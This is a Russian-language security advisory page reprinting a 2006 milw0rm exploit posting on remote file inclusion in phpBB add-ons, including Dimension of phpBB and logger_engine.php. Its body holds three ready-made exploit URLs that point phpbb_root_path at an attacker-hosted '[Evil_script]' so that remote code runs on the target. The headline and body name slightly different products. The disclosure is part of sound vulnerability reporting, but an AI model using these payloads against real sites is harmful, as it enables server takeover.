Уведомление о безопасности: phpBB Security Suite Mod 1.0.0 (logger_engine.php) Remote File Include

[RU] switch to
English Version

Дополнительная информация
  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)
  Dimension of phpBB <= 0.2.5 (phpbb_root_path)
Remote File Includes
  phpBB Security Suite Mod 1.0.0 (logger_engine.
php) Remote File Include
  phpBB Random User Registration Number 1.0 Mod Inclusion Vulnerability
  PHP Live! <= 3.1 help.php Remote File Inclusion vulnerability

From: MILW0RM <submit_(at)_milw0rm.com>
Date: 8 октября 2006 г.
Subject: phpBB Security Suite Mod 1.0.0 (logger_engine.php) Remote File Include

_________________________________________________________________________

          /      \
       \ \ ,, / /
        '-.`\()/`.-'
       .--_'( )'_--.
      / /` /`""`\ `\ \           * SpiderZ Hacking Security *
       | | >< | |
       \ \      / /
           '.__.'

# Author: SpiderZ
# Dimension of phpBB Remote File Inclusion Vulnerability
# For: Dimension of phpBB 0.2.5 (phpBB 2.0.21)
# Site: www.spiderz.altervista.org
# Site02: www.spiderz.netsons.org
_________________________________________________________________________

# Remote File Inclusion

http://site.com/[path]/includes/functions_kb.php?phpbb_root_path=http:
//[Evil_script]

http://site.com/[path]/includes/themen_portal_mitte.php?phpbb_root_path=http:
//[Evil_script]

http://site.com/[path]/includes/logger_engine.php?phpbb_root_path=http:
//[Evil_script]

------------------------------------------------------------------------------

# Download: http://www.phpbb-dimension.de/dload.php?action=category&cat_id=16

------------------------------------------------------------------------------

# milw0rm.com [2006-10-05]